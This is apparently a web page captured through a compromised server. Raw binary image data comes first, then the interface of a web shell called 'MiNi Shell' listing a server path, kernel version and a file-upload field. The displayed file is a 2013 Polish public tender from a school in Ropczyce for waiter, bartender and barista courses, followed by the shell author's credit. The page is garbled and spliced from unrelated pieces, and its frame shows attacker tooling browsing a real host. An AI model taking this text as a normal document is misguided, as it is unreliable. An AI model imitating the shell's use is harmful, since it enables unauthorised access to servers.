JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131230/538890-N-2013.html

<p class="kh_header"><b>Ropczyce: USŁUGA EDUKACYJNA: kurs kelnerski, kurs barmański z elementami flair, kurs baristyczny z elementami Art Latte</b><br>
<b>Numer ogłoszenia: 538890 - 2013; data zamieszczenia: 30.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Agro-Technicznych w Ropczycach , ul. Mickiewicza 13, 39-100 Ropczyce, woj. podkarpackie, tel. 0-17 2218571, faks 0-17 2218201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zsat-ropczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA EDUKACYJNA: kurs kelnerski, kurs barmański z elementami flair, kurs baristyczny z elementami Art Latte.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi edukacyjnej  dotyczącej prowadzenia kursów: Kurs kelnerski, kurs barmański z elementami flair, kurs baristyczny z elementami Art Latte w ramach projektu Podkarpacie stawia na zawodowców

Zamawiający podzielił zamówienie na  3 części:

Część I 
Przedmiotem zamówienia jest świadczenie usługi edukacyjnej  i przeprowadzenie kursu  kelnerskiego dla 2 grup po 15 osób,  po 80 godzin dla każdej grupy, łącznie 160  godzin w Zespole Szkół Agro-Technicznych w Ropczycach,  w terminie do 20 czerwca 2014r. Za godzinę edukacyjną należy przyjąć 45 minut.  Zakres tematyczny oraz wymogi kursu stanowi załącznik nr 1.

Część II
Przedmiotem zamówienia jest świadczenie usługi edukacyjnej i przeprowadzenie kursu barmańskiego z elementami flair dla 2 grup po 12 osób,  po 80 godzin dla każdej grupy, łącznie 160  godzin w Zespole Szkół Agro-Technicznych w Ropczycach, w terminie do 20 czerwca 2014r.  Za godzinę edukacyjną należy przyjąć 45 minut.  Zakres tematyczny oraz wymogi kursu stanowi załącznik nr 1a.

Część III 
 Przedmiotem zamówienia jest   świadczenie usługi edukacyjnej  i przeprowadzenie kursu baristycznego  z elementami Art Latte dla 2 grup po 12 osób,  po 80 godzin dla każdej grupy, łącznie 160  godzin w Zespole Szkół Agro-Technicznych w Ropczycach, w terminie do 20 czerwca 2014r.  Za godzinę edukacyjną należy przyjąć 45 minut. Zakres tematyczny oraz wymogi kursu stanowi załącznik nr 1b.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca na potwierdzenie warunku składa oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W części I 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio udokumentuje, że zrealizował w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy w tym okresie, co najmniej 2 usługi edukacyjne lub szkoleniowe  (szkolenie, warsztaty, kurs, zajęcia pozalekcyjne) o tematyce zajęć obejmującej przedmiot zamówienia w części I  w ilości co najmniej 16 godzin każda.
W  części II 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio udokumentuje, że zrealizował w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy w tym okresie, co najmniej 2 usługi edukacyjne lub szkoleniowe  (szkolenie, warsztaty, kurs, zajęcia pozalekcyjne) o tematyce zajęć obejmującej przedmiot zamówienia w części II  w ilości co najmniej 16 godzin każda.
W  części III 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio   udokumentuje, że zrealizował w okresie ostatnich 3 lat, a jeżeli okres działalności jest    krótszy w tym okresie, co najmniej 2 usługi edukacyjne lub szkoleniowe  (szkolenie, warsztaty, kurs, zajęcia pozalekcyjne) o tematyce zajęć obejmującej przedmiot zamówienia w części II  w ilości co najmniej 16 godzin każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio udokumentuje, że dysponuje lub na czas realizacji usługi będzie dysponował co najmniej 1 osobą, która:
Dla części I
Z uwagi na charakter i zakres obowiązków osoby prowadzącej zajęcia pożądanym jest, aby osoba wyznaczona przez Wykonawcę do prowadzenia kursu stanowiącego  przedmiot usługi będącej przedmiotem zamówienia  w cz. I spełniała  minimum poniższe wymagania:
Wykonawca winien wykazać, że sam posiada lub dysponuje/będzie dysponować osobą, która będzie prowadziła zajęcia praktyczne, ukończyła kurs/szkolenie z zakresu sztuki kelnerskiej, przeprowadziła co najmniej 2 szkolenia 16 godzinne zajęć kursu kelnerskiego w grupach/grupie co najmniej 10-osobowej. Osoby prowadzące kursy powinny posiadać co najmniej 5-letnie doświadczenie w prowadzenie tego typu szkoleń.
Do uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga złożenia wykazu usług szkoleniowych związanych tematycznie ze szkoleniem organizowanym przez Zamawiającego w dwóch ostatnich latach licząc od dnia upływu terminu składania ofert. Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, iż wykonał należycie (np. przez załączenie referencji) 2 takie szkolenia/kursy. Wykonawca musi dysponować taką liczbą wykładowców i instruktorów, aby zapewnić prawidłową oraz terminową realizację usługi szkoleniowej i zagwarantować jej wysoką jakość. 

Dla części II 
Wykonawca winien wykazać, że sam posiada lub dysponuje/będzie dysponować osobą, która będzie prowadziła zajęcia praktyczne, ukończyła kurs/szkolenie egzamin z zakresu sztuki barmańskiej, przeprowadziła 2 szkolenia/kursy co najmniej 16 godzinne zajęć kursu barmańskiego w grupach/grupie co najmniej 10-osobowej. Osoby prowadzące kursy powinny:
posiadać zaświadczenie lub dyplom z mistrzostw polski w danym zawodzie, posiadać co najmniej 5-letnie doświadczenie w prowadzenie tego typu szkoleń.
Do uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga złożenia wykazu usług szkoleniowych związanych tematycznie ze szkoleniem organizowanym przez Zamawiającego w dwóch ostatnich latach licząc od dnia upływu terminu składania ofert. Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, iż wykonał należycie (np. przez załączenie referencji) 2 takie szkolenia/kursy. Wykonawca musi dysponować taką liczbą wykładowców i instruktorów, aby zapewnić prawidłową oraz terminową realizację usługi szkoleniowej i zagwarantować jej wysoką jakość. 

Dla  części III
Wykonawca winien wykazać, że sam posiada lub dysponuje/będzie dysponować osobą, która będzie prowadziła zajęcia praktyczne, ukończyła kurs/szkolenie egzamin z zakresu sztuki baristycznej, przeprowadziła 2 szkolenia/kursy co najmniej 16 godzinne zajęcia kursu baristy w grupach/grupie co najmniej 10-osobowej.
Osoby prowadzące kursy powinny: posiadać zaświadczenie lub dyplom z mistrzostw polski w danym zawodzie, posiadać co najmniej 5-letnie doświadczenie w prowadzenie tego typu szkoleń.
Do uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga złożenia wykazu usług szkoleniowych związanych tematycznie ze szkoleniem organizowanym przez Zamawiającego w dwóch ostatnich latach licząc od dnia upływu terminu składania ofert. Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, iż wykonał należycie (np. przez załączenie referencji) 2 szkolenia/kursy. Wykonawca musi dysponować taką liczbą wykładowców i instruktorów, aby zapewnić prawidłową oraz terminową realizację usługi szkoleniowej i zagwarantować jej wysoką jakość</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio udokumentuje, że dysponuje lub na czas realizacji usługi będzie dysponował co najmniej 1 osobą, która:
Dla części I
Z uwagi na charakter i zakres obowiązków osoby prowadzącej zajęcia pożądanym jest, aby osoba wyznaczona przez Wykonawcę do prowadzenia kursu stanowiącego  przedmiot usługi będącej przedmiotem zamówienia  w cz. I spełniała  minimum poniższe wymagania:
Wykonawca winien wykazać, że sam posiada lub dysponuje/będzie dysponować osobą, która będzie prowadziła zajęcia praktyczne, ukończyła kurs/szkolenie z zakresu sztuki kelnerskiej, przeprowadziła co najmniej 2 szkolenia 16 godzinne zajęć kursu kelnerskiego w grupach/grupie co najmniej 10-osobowej. Osoby prowadzące kursy powinny posiadać co najmniej 5-letnie doświadczenie w prowadzenie tego typu szkoleń.
Do uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga złożenia wykazu usług szkoleniowych związanych tematycznie ze szkoleniem organizowanym przez Zamawiającego w dwóch ostatnich latach licząc od dnia upływu terminu składania ofert. Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, iż wykonał należycie (np. przez załączenie referencji) 2 takie szkolenia/kursy. Wykonawca musi dysponować taką liczbą wykładowców i instruktorów, aby zapewnić prawidłową oraz terminową realizację usługi szkoleniowej i zagwarantować jej wysoką jakość. 

Dla części II 
Wykonawca winien wykazać, że sam posiada lub dysponuje/będzie dysponować osobą, która będzie prowadziła zajęcia praktyczne, ukończyła kurs/szkolenie egzamin z zakresu sztuki barmańskiej, przeprowadziła 2 szkolenia/kursy co najmniej 16 godzinne zajęć kursu barmańskiego w grupach/grupie co najmniej 10-osobowej. Osoby prowadzące kursy powinny:
posiadać zaświadczenie lub dyplom z mistrzostw polski w danym zawodzie, posiadać co najmniej 5-letnie doświadczenie w prowadzenie tego typu szkoleń.
Do uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga złożenia wykazu usług szkoleniowych związanych tematycznie ze szkoleniem organizowanym przez Zamawiającego w dwóch ostatnich latach licząc od dnia upływu terminu składania ofert. Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, iż wykonał należycie (np. przez załączenie referencji) 2 takie szkolenia/kursy. Wykonawca musi dysponować taką liczbą wykładowców i instruktorów, aby zapewnić prawidłową oraz terminową realizację usługi szkoleniowej i zagwarantować jej wysoką jakość. 

Dla  części III
Wykonawca winien wykazać, że sam posiada lub dysponuje/będzie dysponować osobą, która będzie prowadziła zajęcia praktyczne, ukończyła kurs/szkolenie egzamin z zakresu sztuki baristycznej, przeprowadziła 2 szkolenia/kursy co najmniej 16 godzinne zajęcia kursu baristy w grupach/grupie co najmniej 10-osobowej.
Osoby prowadzące kursy powinny: posiadać zaświadczenie lub dyplom z mistrzostw polski w danym zawodzie, posiadać co najmniej 5-letnie doświadczenie w prowadzenie tego typu szkoleń.
Do uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga złożenia wykazu usług szkoleniowych związanych tematycznie ze szkoleniem organizowanym przez Zamawiającego w dwóch ostatnich latach licząc od dnia upływu terminu składania ofert. Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże, iż wykonał należycie (np. przez załączenie referencji) 2 szkolenia/kursy. Wykonawca musi dysponować taką liczbą wykładowców i instruktorów, aby zapewnić prawidłową oraz terminową realizację usługi szkoleniowej i zagwarantować jej wysoką jakość</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca składa oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zsat-ropczyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Agro-Technicznych im. Wincentego Witosa w Ropczycach Adres: 39-100 Ropczyce, ul. A. Mickiewicza 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2014 godzina 10:00, miejsce: Zespół Szkół Agro-Technicznych im. Wincentego Witosa w Ropczycach Adres: 39-100 Ropczyce, ul. A. Mickiewicza 13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Podkarpacie stawia na zawodowców w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs kelnerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kelnerski  dla 2 grup po 15 osób, min. 80 godzin dla każdej grupy, zakres tematyczny kursu powinien obejmować następujące zagadnienia:
- Wizerunek zawodowy kelnera.
- Bielizna stołowa, szkło, porcelana, sztućce, sprzęt używany na stole gościa. - Technika nakrywania (obrusy, skirting, molleton), składanie serwetek.
- Mise en place - przygotowanie stołu pomocniczego (pomocnika kelnerskiego) przed bankietem zasiadanym wg. Menu (wesele na 30 osób).
- Technika noszenia zastawy, zasady noszenia tac kelnerskich.
- Nakrycie podstawowe, rozszerzone, bankietowe, specjalne .
- Metody serwowania. Serwowanie napojów bezalkoholowych, alkoholowych, serwowanie win oraz potraw.
- Rodzaje śniadań. Organizacja bufetu śniadaniowego, przebieg obsługi podczas śniadania wiedeńskiego wzmocnionego, śniadania z szampanem. Brunch.
- Formy przyjęć w zakładzie gastronomicznym. Lampka wina, cocktail party, bankiet angielski, bankiet amerykański, przyjęcia typu bufetowego, bankiet zasiadany.
- Obsługa przyjęcia wg protokołu dyplomatycznego.
- Przygotowanie potraw przy konsumencie, flambirowanie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs barmański z elementami flair.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs barmański z elementami flair dla 2 grup po 12 osób, min. 80 godzin dla każdej grupy, 
Zakres tematyczny kursu powinien obejmować następujące zagadnienia: 
- wprowadzenie do zawodu, 
- terminologia i funkcjonowanie sprzętu barowego, 
- alkoholoznawstwo,
- miksologię- zasady komponowania napojów mieszanych,  
- zasady podawania napojów alkoholowych, 
- dekoracje / garnish oraz sztuka prezentacji,
- odpowiedzialne serwowanie alkoholu, 
- obsługa gości przy barze,  
- organizacja baru i pracy barmana,  
- wprowadzenie do Working Flair_w tym Free Pouringu,  
- podstawy elementów ewolucji przedmiotami barmańskimi,ewolucji butelką (3 x 60 min.) kilka możliwości chwytania butelki,  podstawy elementów ewolucji przy połączeniu dwóch przedmiotów (3 x 60 min.) kubek metalowy w połączeniu z butelką,  podstawy elementów ewolucji i pracy z kilkoma przedmiotami (3 x 60 min.), połączenie: kubek, butelka, szczypce, lód, dekoracja, słomka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs baristyczny z elementami Art. Latte.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs baristyczny z elementami Art. Latte, dla 2 grup po 12 osób, min. 30 godzin dla każdej grupy (w tym minimum 15 godzin praktycznych), zakres tematyczny kursu powinien obejmować następujące zagadnienia:  
- pochodzenie kawy, 
- gatunki kaw,
- mieszanki kaw, 
- rozpoznawanie ziaren Robusty i Arabiki, 
- wypalanie i przechowywanie kaw,
- kofeina i jaj wpływ na człowieka,
- parametry prawidłowego espresso, Ristretto,  Americano,  Coretto, Mocha, Con Panna, Cappuccino, Latte Machiato, Espresso Machiato, Irish cafe, Ice cafe, 
- wpływ grubości mielenia kawy na jakość espresso (regulacja młynka), 
- zasady obsługi, czyszczenia i konserwacji ekspresu ciśnieniowego,
- obsługa klienta przy barze, 
- serwowanie kaw

 Zajęcia praktyczne : 
- wykonywanie poznanych kaw przez wszystkich kursantów,
- zasady spieniania mleka do różnych kaw,
- wykonywanie kaw smakowych oraz warstwowych z syropami,
- Latte art : podstawowe wzory lane z ręki, malowanie wykałaczką, malowanie sosem czekoladowym

Zajęcia praktyczne powinny odbywać się w odpowiednio przystosowanym i wyposażonym 
pomieszczeniu gastronomicznym.
Wykonawca powinien zapewnić niezbędne narzędzia i produkty gwarantujące odpowiedni 
poziom szkolenia. Każdy uczestnik szkolenia powinien mieć dostęp do samodzielnego 
stanowiska pracy.
Wykonawca zobowiązany jest wyposażyć oraz przekazać na własność każdemu uczestnikowi szkolenia odzież roboczą (fartuch, kolorystyka do uzgodnienia).
Po ukończeniu kursu, Wykonawca zobowiązany będzie wydać uczestnikom zaświadczenie o ukończeniu kursu zawodowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com